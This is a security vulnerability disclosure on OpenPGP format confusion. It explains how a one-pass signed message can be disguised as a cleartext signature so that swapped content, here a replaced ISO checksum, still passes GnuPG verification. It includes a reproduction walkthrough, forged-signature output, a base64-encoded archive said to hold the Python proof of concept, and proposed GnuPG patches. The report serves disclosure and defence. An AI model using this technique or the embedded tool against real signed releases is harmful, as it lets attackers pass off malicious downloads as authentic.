OpenPGP Cleartext Signature Framework Susceptible to Format Confusion

An attacker can exploit ambiguous OpenPGP format syntax to deceive users into misinterpreting an ASCII-armored One-Pass Signed Message as a Cleartext Signature Framework message through a malformed header.

Impact

This format confusion enables substitution of the original signed data with malicious content while retaining a seemingly valid cryptographic verification. Users and automated checks may unknowingly accept altered or spoofed payloads as authentic, because popular PGP implementations, such as GnuPG, default to not explicitly displaying the actual data bound by the signature during validation.

Despite documented issues with the Cleartext Signature Framework and GnuPG recommending against it, usage of cleartext signatures remains prevalent.

The attack necessitates a valid OpenPGP signature applied to known, but non-chosen, arbitrary data.

Details

The attack is to disguise a One-Pass Signed Message (e.g. created through gpg --sign) as a Cleartext Signature Framework message (gpg --clearsign)

The RFC 9580 mandates, that a One-Pass Signed Message encompasses the following packets:

a One-Pass Signature Packet: Unprotected metadata, including:
- Hash algorithm,
- Public key algorithm,
- Short key-id of the signing key.
a Literal Data Packet: The signed data.
a Signature Packet: A binding between some public key and some data.

Any OpenPGP signature format containing a valid Signature Packet alongside the signed data, such as the Cleartext Signature Framework, can be converted to a One-Pass Signed Message through:

forgery of a One-Pass Signature Packet (contains no cryptographically protected contents), and
encoding of the signed data in a Literal Data Packet, and
copying the Signature Packet.

Since the conversion preserves both the signed data and the signature, cryptographic integrity remains intact. Keying material - neither private nor public - is not required to conduct the conversion, and a Python script for this procedure is provided in the appendix as a proof of concept.

The attack leverages the ambiguity of the OpenPGP Armor Header Line, which allows a One-Pass Signed Message to be wrapped by BEGIN PGP MESSAGE or BEGIN PGP SIGNATURE.

Additionally, the OpenPGP specifically does not mandate a particular handling of non-whitespace characters preceding or following an ASCII-armored OpenPGP message.

A recipient of an OpenPGP signature might be deceived by an adversary through a malformed Armor Header Line into incorrectly assuming the Cleartext Signature Framework was used. This allows for stuffing arbitrary data, that the user incorrectly believes to be signed.

The OpenPGP specifically does not mandate a particular handling of non-whitespace characters preceding or following an ASCII-armored OpenPGP message. Common OpenPGP implementations silently discard any superfluous data preceding the One-Pass Signed Message including malformed Armor Header Lines. The One-Pass Signed Message subsequently passes cryptographic validation. By default GnuPG does not output the signed data during validation, which further helps in deceiving the user.

Detailed steps to reproduce

Scenario

Alice wants to transmit a file (UwUntu.iso) to Bob. Alice wants to assert her authorship and prevent manipulations to the file. Alice has created an OpenPGP keypair and securely transferred her public key to Bob.

Mallory is a threat actor able to intercept and manipulate communications between Alice and Bob. Her goal is to replace the legitimate file (UwUntu.iso) through her malicious one (EnterpriseLinux.iso) while seemingly preserving valid cryptographic verification.

UwUntu.iso and EnterpriseLinux.iso differ in their contents and thus their SHA256 checksums.

Mallory possesses neither private nor public keying material used by Alice.

Mallory did not interfere with the initial key exchange between Alice and Bob.

Procedure

Alice decides to clearsign the SHA256 checksum of UwUntu.iso:

sha256sum --status UwUntu.iso --tag | gpg --clearsign --local-user [email protected] --armor | tee UwUntu.iso-CHECKSUM

Alice then starts transmission of UwUntu.iso and UwUntu.iso-CHECKSUM to Bob.

Mallory intercepts this transmission. She then converts the Cleartext Signature to a One-Pass Signed Message, that she disguises as a Cleartext Signature:

$ python fake-signature/main.py ./UwUntu.iso-CHECKSUM /dev/stdout
-----BEGIN PGP SIGNED MESSAGE------
Hash: SHA512

<insert your message here>
-----BEGIN PGP SIGNATURE-----

kA0DAQoWANgDY9EJSXMBrFx0AGhqkeBTSEEyNTYgKFV3VW50dS5pc28pID0gZTNi
MGM0NDI5OGZjMWMxNDlhZmJmNGM4OTk2ZmI5MjQyN2FlNDFlNDY0OWI5MzRjYTQ5
NTk5MWI3ODUyYjg1NYh1BAEWCgAdFiEE6B4QAfyDFQjFrHzvANgDY9EJSXMFAmhq
keAACgkQANgDY9EJSXNCPQD+Koh8cfg/dDhgxBhXHUpI4lEg/3y4ZWKFQ4h4Zz0s
x28BALslMa2GINt5AFRyvZwiJ0tXzSm1qPDYnnWFTl5yEjoL
=//2u
-----END PGP SIGNATURE-----

Mallory replaces <insert your message here> with the checksum tag of her malicious EnterpriseLinux.iso:

Mallory replaces the contents of UwUntu.iso with those of EnterpriseLinux.iso.

Having modified both UwUntu.iso and the signature UwUntu.iso-CHECKSUM, Mallory forwards the files to Bob.

Bob verifies the signature:

$ cat ./UwUntu.iso-CHECKSUM | gpg --verify
gpg: Signature made Sun Jul  6 17:10:24 2025 CEST
gpg:                using EDDSA key E81E1001FC831508C5AC7CEF00D80363D1094973
gpg: Good signature from "Alice <[email protected]>" [ultimate]

Confident over the legitimacy of UwUntu.iso-CHECKSUM, Bob verifies, that UwUntu.iso actually matches UwUntu.iso-CHECKSUM:

sha256sum --check UwUntu.iso-CHECKSUM

UwUntu.iso: OK

Mallory’s attack succeeded, as she deceived Bob into believing the manipulated UwUntu.iso to be cryptographically signed by Alice.

The verification process involving cleartext signatures and SHA256 checksums is utilized by multiple well-known software distributions and exists beyond the scope of this theoretical example.

Recommendations

Removal of the Cleartext Signature Framework from the OpenPGP standard helps resolve the issues with the Cleartext Signature Framework. Furthermore, deprecation allows for a graceful phase-out.

OpenPGP users should avoid using cleartext signatures, as is also recommended by GnuPG.

To prevent confusion about the actual signed data, OpenPGP implementations should output the data bound by the signature during validation by default. sequoia-sq does so. GnuPG does not and requires the --output option to be set.

When working with OpenPGP signatures in general, users should instruct their PGP implementation to output the signed data and only use this output for any further or related tasks.

Credits

Finder credits: 49016
PoC & writeup: 49016, Flüpke, Sivizius, Liam

Appendix

fake-signature.tar.xz.b64

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
yi0RscRn+wIAAAAABFla

Disclosure Timeline:

21.10.2025: Submission of initial version of this report.

Upcoming Timeline:

24.10.2025: Submission of a talk for 39th Chaos Communication Congress (39C3). No technical details shared.
21.12.2025: Disclosure of this report on https://seclists.org/fulldisclosure/
26-31.12.2025: If accepted by content team, 39C3 Congress talk regarding this report

Please note: While we might be able to offer some flexibility, our plan is to adhere to the above stated upcoming timeline, regardless of the availability of patches or fixes.

We kindly request allocation of a CVE number to track this issue. Please keep us updated regarding your remediation efforts.

Thank you

Best, Liam

Recommended patches

Shared:

Phasing out cleartext signatures completely is suggested. This requires a new OpenPGP standard version, and a deprecation period. Not possible until disclosure deadline

For GPG: 2. Only verify cleartext signatures if an explicit cleartext verification option is provided. Prevents confusion of signature format. Verification could fail if an expected cleartext signature is malformed. 3. Always output the data that was actually verified, at least for Cleartext signatures and One-Pass signatures. Might be problematic because of binary output and output limits.

Alternatively, output a warning if output option is not used.

For Sequoia: 2. Only verify the signature type as specified in command line. User asks for cleartext -> give them cleartext or nothing.

GPG Option 2

Introduce a new command for verification of cleartext signatures. Accept cleartext signatures only if this command was used. In case no command is provided, the verified data is implicitly printed. Cleartext signatures can be accepted in this case because tampering should be visible in the output. Optionally, signature type detection could include cleartext signatures if an output option was specified.

Separating cleartext signatures into a separate command for verification makes deprecating of this message type easier.

GPG Option 3

A default output file for verification can be set here. STDOUT/STDERR might be dangerous due to binary output, other files are likely a bad default. This should be paired with asking users before printing binary output, skipping binary output or printing as hexadecimal.

diff --git a/g10/gpg.c b/g10/gpg.c
index 99fe5b844..5f80c93e7 100644
--- a/g10/gpg.c
+++ b/g10/gpg.c
@@ -4698,6 +4698,8 @@ main (int argc, char **argv)
        break;
 
       case aVerify:
+  if (!opt.outfile)
+    opt.outfile = "-";
        if (multifile)
          {
            if ((rc = verify_files (ctrl, argc, argv)))

GPG Option 3.1

Inform the user once about the dangers of verifying signatures without checking what was verified. Does not output a warning if an output was explicitly defined or was activated implicitly because no command was given.

diff --git a/g10/mainproc.c b/g10/mainproc.c
index 8108a07b7..b73580f13 100644
--- a/g10/mainproc.c
+++ b/g10/mainproc.c
@@ -234,6 +234,13 @@ add_signature (CTX c, PACKET *pkt)
 {
   kbnode_t node;
 
+  if (!c->any.sig_seen && !c->signed_data.used
+      && !(opt.outfp || opt.outfile || !c->sigs_only))
+    {
+      log_error ("WARNING: Verified data might differ from assumed input,\n");
+      log_error ("use --output to validate actual signed data.");
+    }
+
   c->any.sig_seen = 1;
   if (pkt->pkttype == PKT_SIGNATURE && !c->list)
     {

Sequoia Verification Recommendations

Documentation, CLI and man page document separate verification options. However, the (inline) message verification and cleartext verification are passed to the same handler internally.

There should be separate builders and verifiers for both types as this behaviour is security relevant. Also, it is what users would expect from the man page. Only the documentation declares that sequoia tries to verify despity the type provided by the user.